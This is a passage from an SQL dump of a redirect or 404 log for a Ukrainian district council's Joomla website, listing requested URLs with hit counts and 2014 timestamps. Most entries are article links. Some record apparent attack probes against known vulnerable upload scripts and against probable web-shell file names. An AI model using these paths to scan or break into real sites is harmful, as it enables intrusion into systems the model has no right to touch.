00:00:00',301),(5755,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=57&Itemid=98&lang=ru','','','',6,0,'2014-09-29 12:20:21','0000-00-00 00:00:00',301),(5756,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 12:20:39','0000-00-00 00:00:00',301),(5757,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 12:20:50','0000-00-00 00:00:00',301),(5758,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 12:20:58','0000-00-00 00:00:00',301),(5759,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=ru&Itemid=','','','',5,0,'2014-09-29 12:21:24','0000-00-00 00:00:00',301),(5760,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=uk&Itemid=','','','',4,0,'2014-09-29 12:21:34','0000-00-00 00:00:00',301),(5761,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-29 12:21:42','0000-00-00 00:00:00',301),(5762,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-29 12:21:51','0000-00-00 00:00:00',301),(5763,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=4:2010-06-05-12-51-18&layout=blog&Itemid=8&lang=uk','','','',5,0,'2014-09-29 12:23:54','0000-00-00 00:00:00',301),(5764,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=6:2010-06-05-12-52-17&layout=blog&Itemid=9&lang=uk','','','',1,0,'2014-09-29 12:23:59','0000-00-00 00:00:00',301),(5765,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=941:2013-02-27-14-30-15&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-29 12:35:42','0000-00-00 00:00:00',301),(5766,'http://www.malyn-rayrada.org.ua/_old/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-29 12:49:18','0000-00-00 00:00:00',301),(5767,'http://www.malyn-rayrada.org.ua/_old/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-09-29 12:49:23','0000-00-00 00:00:00',301),(5768,'http://www.malyn-rayrada.org.ua/_old/components/com_community/index.html','','','',1,0,'2014-09-29 12:49:27','0000-00-00 00:00:00',301),(5769,'http://www.malyn-rayrada.org.ua/_old/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-29 12:49:31','0000-00-00 00:00:00',301),(5770,'http://www.malyn-rayrada.org.ua/_old/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-09-29 12:49:36','0000-00-00 00:00:00',301),(5771,'http://www.malyn-rayrada.org.ua/_old/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-09-29 12:49:43','0000-00-00 00:00:00',301),(5772,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1186:-2013-i-2014-&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-29 12:54:08','0000-00-00 00:00:00',301),(5773,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=960:-19-&lang=ru&option=com_content&view=article','','','',5,0,'2014-09-29 12:54:14','0000-00-00 00:00:00',301),(5774,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=en','','','',2,0,'2014-09-29 13:10:15','0000-00-00 00:00:00',301),(5775,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1152:2013-11-28-14-58-05&lang=ru&option=com_content&view=article','','','',3,0,'2014-09-29 13:22:51','0000-00-00 00:00:00',301),(5776,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10&id=1262:2014-03-31-11-36-45&lang=ru&option=com_content&view=article','','','',6,0,'2014-09-29 13:23:07','0000-00-00 00:00:00',301),(5777,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-29 13:39:15','0000-00-00 00:00:00',301),(5778,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-29 13:59:11','0000-00-00 00:00:00',301),(5779,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1013:2013-06-01-03-58-38&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-29 14:07:27','0000-00-00 00:00:00',301),(5780,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1262:2014-03-31-11-36-45&catid=10&Itemid=17&lang=uk','','','',3,0,'2014-09-29 14:34:45','0000-00-00 00:00:00',301),(5781,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1262:2014-03-31-11-36-45&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',28,0,'2014-09-29 14:40:02','0000-00-00 00:00:00',301),(5782,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1262:2014-03-31-11-36-45&catid=10&Itemid=17&lang=ru','','','',11,0,'2014-09-29 14:44:56','0000-00-00 00:00:00',301),(5783,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1262:2014-03-31-11-36-45&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',12,0,'2014-09-29 14:48:52','0000-00-00 00:00:00',301),(5784,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1070:2013-08-23-04-27-00&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-29 14:57:20','0000-00-00 00:00:00',301),(5785,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1161:2013-12-18-13-34-32&lang=uk&option=com_content&view=article','','','',3,0,'2014-09-29 14:57:25','0000-00-00 00:00:00',301),(5786,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1065:2013-08-14-12-52-50&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-29 14:57:31','0000-00-00 00:00:00',301),(5787,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1262:2014-03-31-11-36-45&catid=10&Itemid=17&lang=ru','','','',3,0,'2014-09-29 15:34:33','0000-00-00 00:00:00',301),(5788,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1322:-2012-2015-&catid=59&Itemid=107&lang=en','','','',4,0,'2014-09-29 15:46:26','0000-00-00 00:00:00',301),(5789,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1347:2014-06-19-11-19-16&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-09-29 16:02:01','0000-00-00 00:00:00',301),(5790,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1120:2013-10-25-12-32-17&lang=ru&option=com_content&view=article','','','',4,0,'2014-09-29 16:32:28','0000-00-00 00:00:00',301),(5791,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=934:---------6---16112010-5---------------&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-29 16:32:31','0000-00-00 00:00:00',301),(5792,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1170:2014-01-08-11-02-06&lang=ru&option=com_content&view=article','','','',4,0,'2014-09-29 16:32:46','0000-00-00 00:00:00',301),(5793,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1262:2014-03-31-11-36-45&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',2,0,'2014-09-29 16:33:15','0000-00-00 00:00:00',301),(5794,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1262:2014-03-31-11-36-45&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',2,0,'2014-09-29 16:42:01','0000-00-00 00:00:00',301),(5795,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53&id=1085:2013-09-11-12-15-54&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-29 17:35:56','0000-00-00 00:00:00',301),(5796,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=954:-19-6-&lang=uk&option=com_content&view=article','','','',4,0,'2014-09-29 17:36:01','0000-00-00 00:00:00',301),(5797,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1054:2013-07-19-11-38-20&lang=ru&option=com_content&view=article','','','',3,0,'2014-09-29 17:36:14','0000-00-00 00:00:00',301),(5798,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&lang=ru','','','',6,0,'2014-09-29 17:39:24','0000-00-00 00:00:00',301),(5799,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1035:2013-06-25-09-55-31&catid=11&lang=en&Itemid=','','','',7,0,'2014-09-29 17:51:07','0000-00-00 00:00:00',301),(5800,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1043:-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-29 18:07:24','0000-00-00 00:00:00',301),(5801,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&lang=en&Itemid=','','','',3,0,'2014-09-29 18:50:54','0000-00-00 00:00:00',301),(5802,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1359:2014-07-07-08-13-48&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-29 18:55:04','0000-00-00 00:00:00',301),(5803,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1220:2014-02-21-15-56-19&lang=uk&option=com_content&view=article','','','',4,0,'2014-09-29 19:42:35','0000-00-00 00:00:00',301),(5804,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47&id=933:-2013-2017-&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-29 19:42:39','0000-00-00 00:00:00',301),(5805,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=en&Itemid=','','','',5,0,'2014-09-29 19:48:47','0000-00-00 00:00:00',301),(5806,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10&id=1261:2014-03-31-11-35-31&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-29 20:43:28','0000-00-00 00:00:00',301),(5807,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1092:2013-09-19-12-18-37&lang=ru&option=com_content&view=article','','','',2,0,'2014-09-29 20:43:30','0000-00-00 00:00:00',301),(5808,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=972:2013-03-19-10-50-05&lang=ru&option=com_content&view=article','','','',3,0,'2014-09-29 21:17:35','0000-00-00 00:00:00',301),(5809,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/undefined/','','','',6,0,'2014-09-29 22:00:10','0000-00-00 00:00:00',301),(5810,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1239:--29----6-&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-29 22:17:33','0000-00-00 00:00:00',301),(5811,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1376:2014-08-22-08-01-53&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-29 22:26:59','0000-00-00 00:00:00',301),(5812,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1071:2013-08-27-14-06-18&lang=uk&option=com_content&view=article','','','',3,0,'2014-09-29 22:51:28','0000-00-00 00:00:00',301),(5813,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1231:-q-q&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-29 22:51:40','0000-00-00 00:00:00',301),(5814,'http://www.malyn-rayrada.org.ua/index.php?Itemid=95&catid=54&id=1143:2013-11-26-13-23-37&lang=ru&option=com_content&view=article','','','',4,0,'2014-09-29 22:51:54','0000-00-00 00:00:00',301),(5815,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:--21022013-&id=918:-2013-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-29 22:52:19','0000-00-00 00:00:00',301),(5816,'http://www.malyn-rayrada.org.ua/images/xxu.php','','','',12,0,'2014-09-29 23:02:26','0000-00-00 00:00:00',301),(5817,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-29 23:06:42','0000-00-00 00:00:00',301),(5818,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=992:-3-&lang=uk&option=com_content&view=article','','','',5,0,'2014-09-29 23:51:21','0000-00-00 00:00:00',301),(5819,'http://www.malyn-rayrada.org.ua/index.php?view=article&catid=11:2010-06-05-14-33-33&id=1338:2014-06-11-14-18-06&tmpl=component&print=1&layout=default&page=&lang=uk','','','',3,0,'2014-09-30 00:00:36','0000-00-00 00:00:00',301),(5820,'http://www.malyn-rayrada.org.ua/index.php?Itemid=87&catid=48&id=955:2013-03-07-06-31-04&lang=ru&option=com_content&view=article','','','',1,0,'2014-09-30 00:25:48','0000-00-00 00:00:00',301),(5821,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1246:-2013-&lang=uk&option=com_content&view=article','','','',3,0,'2014-09-30 00:25:51','0000-00-00 00:00:00',301),(5822,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=939:-18-&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-30 00:26:00','0000-00-00 00:00:00',301),(5823,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1101:2013-10-03-07-11-01&lang=ru&option=com_content&view=article','','','',1,0,'2014-09-30 00:26:05','0000-00-00 00:00:00',301),(5824,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-30 00:46:53','0000-00-00 00:00:00',301),(5825,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1178:2014-01-21-12-39-34&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-30 00:54:11','0000-00-00 00:00:00',301),(5826,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=ru','','','',2,0,'2014-09-30 01:19:34','0000-00-00 00:00:00',301),(5827,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=uk&Itemid=','','','',3,0,'2014-09-30 01:23:08','0000-00-00 00:00:00',301),(5828,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=940:2013-02-21-14-02-14&lang=ru&option=com_content&view=article','','','',1,0,'2014-09-30 01:25:00','0000-00-00 00:00:00',301),(5829,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1130:2013-11-07-14-04-12&lang=ru&option=com_content&view=article','','','',17,0,'2014-09-30 01:25:02','0000-00-00 00:00:00',301),(5830,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=956:2013-03-07-14-51-33&catid=11&Itemid=14&lang=uk','','','',9,0,'2014-09-30 01:37:28','0000-00-00 00:00:00',301),(5831,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1047:2013-07-10-05-51-36&lang=ru&option=com_content&view=article','','','',1,0,'2014-09-30 02:00:47','0000-00-00 00:00:00',301),(5832,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1193:-2014-2015-&lang=uk&option=com_content&view=article','','','',3,0,'2014-09-30 02:59:05','0000-00-00 00:00:00',301),(5833,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51:--19072013-&id=1055:2013-07-19-11-43-17&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-30 03:35:25','0000-00-00 00:00:00',301),(5834,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=974:2013-03-20-09-31-37&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-30 03:35:31','0000-00-00 00:00:00',301),(5835,'http://www.malyn-rayrada.org.ua/index.php/malinshchina-ta-malinchani','','','',4,0,'2014-09-30 04:00:58','0000-00-00 00:00:00',301),(5836,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1134:-25-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-30 04:02:01','0000-00-00 00:00:00',301),(5837,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1319:--------2014--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',9,0,'2014-09-30 04:38:55','0000-00-00 00:00:00',301),(5838,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=956:2013-03-07-14-51-33&lang=ru&option=com_content&view=article','','','',2,0,'2014-09-30 05:10:24','0000-00-00 00:00:00',301),(5839,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=942:-19-6-&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-30 05:10:28','0000-00-00 00:00:00',301),(5840,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1184:----27----6-&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-30 05:10:41','0000-00-00 00:00:00',301),(5841,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1073:2013-08-30-11-12-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',12,0,'2014-09-30 05:13:25','0000-00-00 00:00:00',301),(5842,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1137:2013-11-15-13-07-04&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-30 06:00:20','0000-00-00 00:00:00',301),(5843,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1242:------25--2011--74---19--2011---193-&lang=ru&option=com_content&view=article','','','',2,0,'2014-09-30 06:06:46','0000-00-00 00:00:00',301),(5844,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=908:2013-01-21-08-58-40&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-30 06:06:54','0000-00-00 00:00:00',301),(5845,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=919:2013-01-31-10-15-40&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-30 06:45:04','0000-00-00 00:00:00',301),(5846,'http://www.malyn-rayrada.org.ua/images/stories/ads.php','','','',1,0,'2014-09-30 07:05:30','0000-00-00 00:00:00',301),(5847,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=uk','','','',4,0,'2014-09-30 07:07:20','0000-00-00 00:00:00',301),(5848,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1276:2014-04-10-13-26-15&catid=57&Itemid=98&lang=ru','','','',5,0,'2014-09-30 07:08:59','0000-00-00 00:00:00',301),(5849,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=uk','','','',5,0,'2014-09-30 07:09:15','0000-00-00 00:00:00',301),(5850,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&catid=11&lang=uk','','','',6,0,'2014-09-30 07:09:31','0000-00-00 00:00:00',301),(5851,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11&lang=uk','','','',2,0,'2014-09-30 07:09:57','0000-00-00 00:00:00',301),(5852,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=uk','','','',2,0,'2014-09-30 07:30:55','0000-00-00 00:00:00',301),(5853,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=ru','','','',4,0,'2014-09-30 07:32:32','0000-00-00 00:00:00',301),(5854,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=ru','','','',2,0,'2014-09-30 07:32:37','0000-00-00 00:00:00',301),(5855,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-30 07:35:21','0000-00-00 00:00:00',301),(5856,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=ru&Itemid=','','','',1,0,'2014-09-30 07:36:57','0000-00-00 00:00:00',301),(5857,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1232:2014-03-02-14-32-43&lang=uk&option=com_content&view=article','','','',3,0,'2014-09-30 07:41:15','0000-00-00 00:00:00',301),(5858,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-30 08:03:43','0000-00-00 00:00:00',301),(5859,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=uk&Itemid=','','','',1,0,'2014-09-30 08:05:36','0000-00-00 00:00:00',301),(5860,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-09-30 08:10:40','0000-00-00 00:00:00',301),(5861,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=uk&Itemid=0','','','',1,0,'2014-09-30 08:12:23','0000-00-00 00:00:00',301),(5862,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=882:2012-12-21-17-08-23&lang=uk&option=com_content&view=article','','','',1,0,'2014-09-30 08:19:59','0000-00-00 00:00:00',301),(5863,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10&id=1261:2014-03-31-11-35-31&lang=ru&option=com_content&view=article','','','',5,0,'2014-09-30 08:20:01','0000-00-00 00:00:00',301),(5864,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-30 08:40:23','0000-00-00 00:00:00',301),(5865,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-30 08:40:25','0000-00-00 00:00:00',301),(5866,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=979:2013-03-29-09-18-27&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-09-30 08:42:53','0000-00-00 00:00:00',301),(5867,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1328:2014-06-01-11-58-56&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',16,0,'2014-09-30 08:56:02','0000-00-00 00:00:00',301),(5868,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1147:2013-11-28-09-57-12&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-30 09:14:50','0000-00-00 00:00:00',301),(5869,'http://www.malyn-rayrada.org.ua/images/stories/xnight.php.php?rf','','','',2,0,'2014-09-30 09:45:56','0000-00-00 00:00:00',301),(5870,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11&Itemid=14&lang=en','','','',17,0,'2014-09-30 09:49:53','0000-00-00 00:00:00',301),(5871,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=57:--15042014-&Itemid=98&lang=uk','','','',3,0,'2014-09-30 09:52:24','0000-00-00 00:00:00',301),(5872,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1245:2014-03-17-17-23-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-09-30 09:54:44','0000-00-00 00:00:00',301),(5873,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1007:-4-&lang=ru&option=com_content&view=article','','','',3,0,'2014-09-30 09:55:19','0000-00-00 00:00:00',301),(5874,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1034:2013-06-23-15-11-25&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-30 10:49:11','0000-00-00 00:00:00',301),(5875,'http://malyn-rayrada.org.ua/images/stories/xnight.php.php?rf','','','',1,0,'2014-09-30 11:12:53','0000-00-00 00:00:00',301),(5876,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1240:2014-03-17-07-01-32&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-30 11:29:16','0000-00-00 00:00:00',301),(5877,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1207:-2007-2015-&lang=uk&option=com_content&view=article','','','',2,0,'2014-09-30 11:29:35','0000-00-00 00:00:00',301),(5878,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1300:2014-04-25-07-21-54&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-30 12:32:38','0000-00-00 00:00:00',301),(5879,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',23,0,'2014-09-30 13:00:33','0000-00-00 00:00:00',301),(5880,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1081:-2013-2017-&lang=uk&option=com_content&view=article','','','',3,0,'2014-09-30 13:04:49','0000-00-00 00:00:00',301),(5881,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1241:2014-03-17-07-05-06&lang=ru&option=com_content&view=article','','','',3,0,'2014-09-30 13:04:57','0000-00-00 00:00:00',301),(5882,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-09-30 13:06:19','0000-00-00 00:00:00',301),(5883,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-50-56','','','',1,0,'2014-09-30 13:11:16','0000-00-00 00:00:00',301),(5884,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-51-18','','','',1,0,'2014-09-30 13:15:34','0000-00-00 00:00:00',301),(5885,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-50-39','','','',1,0,'2014-09-30 13:16:25','0000-00-00 00:00:00',301),(5886,'http://www.malyn-rayrada.org.ua/index.php/--11032013-','','','',1,0,'2014-09-30 13:16:51','0000-00-00 00:00:00',301),(5887,'http://www.malyn-rayrada.org.ua/index.php/2010-06-07-09-43-24','','','',1,0,'2014-09-30 13:17:16','0000-00-00 00:00:00',301),(5888,'http://www.malyn-rayrada.org.ua/index.php/publichna-informacija_2','','','',1,0,'2014-09-30 13:17:43','0000-00-00 00:00:00',301),(5889,'http://www.malyn-rayrada.org.ua/index.php/--23042013-','','','',1,0,'2014-09-30 13:18:09','0000-00-00 00:00:00',301),(5890,'http://www.malyn-rayrada.org.ua/index.php/2010-06-07-09-14-38','','','',1,0,'2014-09-30 13:18:34','0000-00-00 00:00:00',301),(5891,'http://www.malyn-rayrada.org.ua/index.php/--25102013-','','','',1,0,'2014-09-30 13:19:51','0000-00-00 00:00:00',301),(5892,'http://www.malyn-rayrada.org.ua/index.php/--15122010-','','','',3,0,'2014-09-30 13:20:16','0000-00-00 00:00:00',301),(5893,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-51-34','','','',1,0,'2014-09-30 13:20:44','0000-00-00 00:00:00',301),(5894,'http://www.malyn-rayrada.org.ua/index.php/2010-06-06-03-57-58','','','',1,0,'2014-09-30 13:21:08','0000-00-00 00:00:00',301),(5895,'http://www.malyn-rayrada.org.ua/index.php/--21102011-','','','',1,0,'2014-09-30 13:22:25','0000-00-00 00:00:00',301),(5896,'http://www.malyn-rayrada.org.ua/index.php/--29112013-?start=5','','','',1,0,'2014-09-30 13:22:51','0000-00-00 00:00:00',301),(5897,'http://www.malyn-rayrada.org.ua/index.php/2010-06-06-09-34-01','','','',1,0,'2014-09-30 13:23:16','0000-00-00 00:00:00',301),(5898,'http://www.malyn-rayrada.org.ua/fckeditor/editor/filemanager/connectors/php/upload.php','','','',7,0,'2014-09-30 13:54:17','0000-00-00 00:00:00',301),(5899,'http://www.malyn-rayrada.org.ua/fckeditor/editor/filemanager/upload/php/upload.php','','','',9,0,'2014-09-30 13:54:20','0000-00-00 